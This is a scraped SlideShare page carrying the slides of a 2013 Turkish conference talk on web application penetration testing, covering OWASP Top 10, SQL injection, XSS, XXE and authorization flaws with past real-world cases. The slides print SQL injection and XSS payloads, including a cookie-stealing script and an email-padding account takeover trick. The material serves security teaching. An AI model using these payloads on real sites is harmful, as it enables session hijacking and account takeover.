Successfully reported this slideshow.

Ozgur web teknolojileri'13

14

Share

Nov. 23, 2013
14 likes 2,792 views
Upcoming SlideShare
Kali ile Linux'e Giriş | IntelRAD
Kali ile Linux'e Giriş | IntelRAD
Loading in …3
×
1 of 41
1 of 41

Ozgur web teknolojileri'13

Nov. 23, 2013
14 likes 2,792 views

14

Share

Download to read offline

Özgür web teknolojileri günleri 2013 sunumum.

Özgür web teknolojileri günleri 2013 sunumum.

Recommended

More Related Content

Viewers also liked

Web Servislerine Yönelik Sızma Testleri
BGA Bilgi Güvenliği A.Ş.
ÖNCEL AKADEMİ: AKADEMİK İNGİLİZCE
Ali Osman Öncel
Menggunakan Kali Linux Untuk Mengetahui Kelemahan Implementasi TI
Ismail Fahmi
Indonesia OneSearch dan Biblio Metric Analysis
Ismail Fahmi
Beyazsapkalihackeregitimikitap 140409071714-phpapp02
Öncü Furkan
BackTrack Linux-101 Eğitimi
BGA Bilgi Güvenliği A.Ş.
Bga some-2016
MEB Adalar Halk Eğitim Merkezi
Hack wifi password using kali linux
Helder Oliveira
Facebook Üzerinde Güvenlik ve Gizlilik Ayarları
BGA Bilgi Güvenliği A.Ş.
Sosyal Medyada Psikolojik Harekat Teknikleri ve Tespit Yöntemleri
BGA Bilgi Güvenliği A.Ş.
Siber güvenlik kampı sunumu
BGA Bilgi Güvenliği A.Ş.
Kurumsal Ağlarda Saldırı Tespiti Amaçlı Honeypot Sistemlerin Efektif Kullanımı
BGA Bilgi Güvenliği A.Ş.
Siber Dünyada Modern Arka Kapılar
BGA Bilgi Güvenliği A.Ş.
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
BGA Bilgi Güvenliği A.Ş.
SWIFT Altyapısına Yönelik Saldırıların Teknik Analizi - NETSEC
BGA Bilgi Güvenliği A.Ş.

Similar to Ozgur web teknolojileri'13

Hacking WebApps for fun and profit : how to approach a target?
Yassine Aboukir
Php Security - OWASP
Mizno Kruge
Hacking Your Way To Better Security
Colin O'Dell
Cos 432 web_security
Michael Freyberger
.NET Security Topics
Shawn Gorrell
Максим Кочкин (Wamba)
Ontico
Writing Secure WordPress Code
Brad Williams
New web attacks-nethemba
OWASP (Open Web Application Security Project)
Web Security - Introduction v.1.3
Oles Seheda
[DevDay2018] Security Testing - By Thuy Nguyen, Software Engineer at Axon Act...
DevDay.org
Introduction to Cross Site Scripting ( XSS )
Irfad Imtiaz
Making Web Development "Secure By Default"
Duo Security
XSS - Attacks & Defense
Blueinfy Solutions
Spot the Web Vulnerability
Miroslav Stampar
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Alexandre Morgaut
OWASP: безопасное программирование на PHP.
EatDog
Hacking 101 3
Nitroxis Sprl
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
Samvel Gevorgyan
Prevoty NYC Java SIG 20150730
chadtindel
Owasp eee 2015 csrf
Aurelijus Stanislovaitis

More from Mehmet Ince

Drupal Coder Zafiyet Analizi & İstismar Kodu Geliştirimesi
Mehmet Ince
Wordpress security
Mehmet Ince
Breaking The Framework's Core #PHPKonf 2016
Mehmet Ince
Web Uygulama Güvenliği 101
Mehmet Ince
Web Uygulamalarında Kaynak Kod Analizi - 1
Mehmet Ince
Web Uygulamalarında Kayank Kod Analizi – II
Mehmet Ince

Featured

What to Upload to SlideShare
SlideShare
Be A Great Product Leader (Amplify, Oct 2019)
Adam Nash
Trillion Dollar Coach Book (Bill Campbell)
Eric Schmidt
APIdays Paris 2019 - Innovation @ scale, APIs as Digital Factories' New Machi...
apidays
A few thoughts on work life-balance
Wim Vanderbauwhede
Is vc still a thing final
Mark Suster
The GaryVee Content Model
Gary Vaynerchuk
Mammalian Brain Chemistry Explains Everything
Loretta Breuning, PhD
Blockchain + AI + Crypto Economics Are We Creating a Code Tsunami?
Dinis Guarda
The AI Rush
Jean-Baptiste Dumont
AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017
Carol Smith
10 facts about jobs in the future
Pew Research Center's Internet & American Life Project
Harry Surden - Artificial Intelligence and Law Overview
Harry Surden
Inside Google's Numbers in 2017
Rand Fishkin
Pinot: Realtime Distributed OLAP datastore
Kishore Gopalakrishna
How to Become a Thought Leader in Your Niche
Leslie Samuel
Visual Design with Data
Seth Familian
Designing Teams for Emerging Challenges
Aaron Irizarry
UX, ethnography and possibilities: for Libraries, Museums and Archives
Ned Potter
Winners and Losers - All the (Russian) President's Men
Ian Bremmer

Related Books

Free with a 14 day trial from Scribd

See all
We Should All Be Millionaires: A Woman’s Guide to Earning More, Building Wealth, and Gaining Economic Power Rachel Rodgers
(4.5/5)
Free
Believe IT: How to Go from Underestimated to Unstoppable Jamie Kern Lima
(4.5/5)
Free
Hot Seat: What I Learned Leading a Great American Company Jeff Immelt
(4.5/5)
Free
Ladies Get Paid: The Ultimate Guide to Breaking Barriers, Owning Your Worth, and Taking Command of Your Career Claire Wasserman
(5/5)
Free
The Ministry of Common Sense: How to Eliminate Bureaucratic Red Tape, Bad Excuses, and Corporate BS Martin Lindstrom
(4/5)
Free
Blue-Collar Cash: Love Your Work, Secure Your Future, and Find Happiness for Life Ken Rusk
(4/5)
Free
How I Built This: The Unexpected Paths to Success from the World's Most Inspiring Entrepreneurs Guy Raz
(4.5/5)
Free
Inclusify: The Power of Uniqueness and Belonging to Build Innovative Teams Stefanie K. Johnson
(0/5)
Free
No Filter: The Inside Story of Instagram Sarah Frier
(4.5/5)
Free
Ask for More: 10 Questions to Negotiate Anything Alexandra Carter
(4/5)
Free
How to Lead: Wisdom from the World's Greatest CEOs, Founders, and Game Changers David M. Rubenstein
(5/5)
Free
Bezonomics: How Amazon Is Changing Our Lives and What the World's Best Companies Are Learning from It Brian Dumaine
(4/5)
Free

Related Audiobooks

Free with a 14 day trial from Scribd

See all
Your Work from Home Life: Redefine, Reorganize and Reinvent Your Remote Work (Tips for Building a Home-Based Working Career) M.J. Fievre
(4/5)
Free
Outstanding Leadership Stan Toler
(4/5)
Free
Full Out: Lessons in Life and Leadership from America's Favorite Coach Monica Aldama
(4/5)
Free
Larger Than Yourself: Reimagine Industries, Lead with Purpose & Grow Ideas into Movements Thibault Manekin
(5/5)
Free
Winning: The Unforgiving Race to Greatness Tim S. Grover
(5/5)
Free
Impact Players: How to Take the Lead, Play Bigger, and Multiply Your Impact Findaway
(5/5)
Free
The One Week Marketing Plan: The Set It & Forget It Approach for Quickly Growing Your Business Mark Satterfield
(4.5/5)
Free
The Perfect Day to Boss Up Rick Ross
(4.5/5)
Free
Business Networking for Introverts: How to Build Relationships the Authentic Way Karlo Krznarić
(4.5/5)
Free
Power, for All: How It Really Works and Why It's Everyone's Business Julie Battilana
(4/5)
Free
Create: Tools from Seriously Talented People to Unleash Your Creative Life Marc Silber
(4.5/5)
Free
You're Invited: The Art and Science of Connection, Trust, and Belonging Jon Levy
(4.5/5)
Free
Flex: Reinventing Work for a Smarter, Happier Life Findaway
(4.5/5)
Free
Nailing the Interview: A Comprehensive Guide to Job Interviewing Imran Afzal
(4.5/5)
Free
Everybody Has a Podcast (Except You): A How-To Guide from the First Family of Podcasting Justin McElroy
(5/5)
Free
Just Work: How to Root Out Bias, Prejudice, and Bullying to Build a Kick-Ass Culture of Inclusivity Kimberly Scott
(3.5/5)
Free

Ozgur web teknolojileri'13

  1. 1. Web Uygulama Sızma Testi Özgür Web Teknolojileri Günleri ‘13
  2. 2. root@intelrad:~$ whoami Mehmet Dursun İNCE Pentest Lead at IntelRAD Zafiyet Araştırmacısı White Hat Hacker Linux & OpenSource PHP, Python
  3. 3. İÇERİK 1. 2. 3. 4. Saldırı nasıl gerçekleşir ? Yaşanmış örnekler ile Uygulama Zafiyetleri Veri tabanı davranışları Son
  4. 4. İNPUT
  5. 5. OWASP 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. Injection Broken Authentication and Session Management Cross-Site Scripting (XSS) Insecure Direct Object References Security Misconfiguration Sensitive Data Exposure Missing Function Level Access Control Cross-Site Request Forgery (CSRF) Using Components with Known Vulnerabilities Unvalidated Redirects and Forwards
  6. 6. HTTP PROXY
  7. 7. INJECTION
  8. 8. Sql Injection Gerçek Hayattan Örnek http://sea.ebay.com/list.php?catid=36
  9. 9. Sql Injection Gerçek Hayattan Örnek
  10. 10. Sql Injection Gerçek Hayattan Örnek HTTP requestleri kullanıcılar tarafından manipüle edilebildiğine göre; checkbox[]=2 #SELECT title,content FROM foo WHERE id = 2 Yerine checkbox[]=5 LIMIT 1,1 UNION ALL SELECT version() #SELECT title, content FROM foo WHERE id = 5 LIMIT 1,1 UNION SELECT version(),2
  11. 11. Sql Injection Gerçek Hayattan Örnek Tablo isimleri; phpcms_admin phpcms_admin_role phpcms_admin_role_priv phpcms_ads …
  12. 12. SQLI UYGULAMA
  13. 13. HASHCAT 25 GPU 348 Milyar/sn
  14. 14. XSS Nedir ? www.site.com/search/?keyword=Mehmet
  15. 15. XSS Nedir ? www.site.com/search/?keyword=<script>alert(/XSS/)</script>
  16. 16. XSS Gerçek Hayattan Örnek - 1 1. 2. 3. 4. From : <img src=# onerror=alert(document.cookie)>@blabla.com To: victim@gmail.com victim@gmail.com sahibi mail.google.com adresine girer Fixed : 08.08.2013
  17. 17. XSS Gerçek Hayattan Örnek - 2 1. Dropbox üzerinde '"><img src=# onerror=alert(document.domain)>.txt 2. 3. Peki Linux üzerinde touch komutu ile bu isimde dosya oluşturulursa ? Facebook gruplarında Dropbox üzerinden dosya paylaşımı yapılabilmektedir. 4. Peki ya sonra...
  18. 18. XSS Gerçek Hayattan Örnek - 2 Sonuç: Grup üyeleri olan tüm kullanıcıların tarayıcılarında javascript kodu çalıştırabilme yetkisi.
  19. 19. XSS UYGULAMA <script>document.location="//localhost/?ke=" +document.cookie</script>
  20. 20. Google Reflected XSS - 2 gün önce!
  21. 21. Google Reflected XSS - 2 gün önce!
  22. 22. XSS Gerçek Hayattan Örnek - 3 http://www.xyz.com/news/throw-pepper-sprey/#!prettyPhoto[gallery2]/0/
  23. 23. XSS Gerçek Hayattan Örnek - 3 http://www.xyz.com/news/throw-pepper-sprey/#!prettyPhoto[gallery2]/”>svg onload=alert(document.cookie)/
  24. 24. XSS Gerçek Hayattan Örnek - 3 prettyPhoto javascript library’si analiz edildiğinde; NOT: Jquery 1.9.1 öncesi versiyonları etkileyen jQuery zafiyeti. Framework’e -çok- güvenmek.
  25. 25. XSS Gerçek Hayattan Örnek - 3 3th party yazılımı kullanan projeler; 107 adet projede XSS zafiyeti mevcut.
  26. 26. Xml eXternal Entity Nedir ?
  27. 27. Gerçek Hayattan XXE Örneği
  28. 28. XXE UYGULAMA
  29. 29. Yetki Hataları www.test.com/fatura/aylik/1337 www.test.com/fatura/aylik/1338
  30. 30. Gerçek Hayattan Yetki Hataları https://ap.nokia.com/APPortalExt/mycompany/requests.aspx?id=26033
  31. 31. Gerçek Hayattan Yetki Hataları https://ap.nokia.com/APPortalExt/mycompany/requests.aspx?id=26029
  32. 32. Veritabanı
  33. 33. Veritabanı
  34. 34. Veritabanı
  35. 35. Veritabanı
  36. 36. Veritabanı
  37. 37. Gerçek Hayattan Örnek
  38. 38. Gerçek Hayattan Örnek Sonuç TRUE döner.
  39. 39. Gerçek Hayattan Örnek 1. email VARCHAR (100); 2. Hacker sisteme aşağıdaki mail adresi ile üye olur ‘admin@abc.com 100 adet boşluk AAAAAA’ 3. checkEmailAdresi methodu TRUE döner. 4. Hacker yazılım üzerinde kendi şifresini değiştirir. 5. Yazılım şifre güncellemesini user id yerine email adresine göre yapar. 6. Administratorun ve hacker’ın şifresi updatelenir.
  40. 40. ÖNERİLER ● Web Programlama Dili ● Exploit-db.com ● E-Kitaplar; Kali ve Linux’e Giriş [Turkish] Web Application Security #101 [Turkish] Source Code Analysis at Web Applications - I [Turkish] Source Code Analysis at Web Applications - II Web Application Hacker's Handbook
  41. 41. Teşekkürler Mehmet Dursun INCE mehmet.ince@intelrad.com twitter.com/mmetince Teşekkürler : 1. Roy Castillo 2. Detectify 3. Vinesh Redkat 4. mkyong.com 5. Oren Hafif

×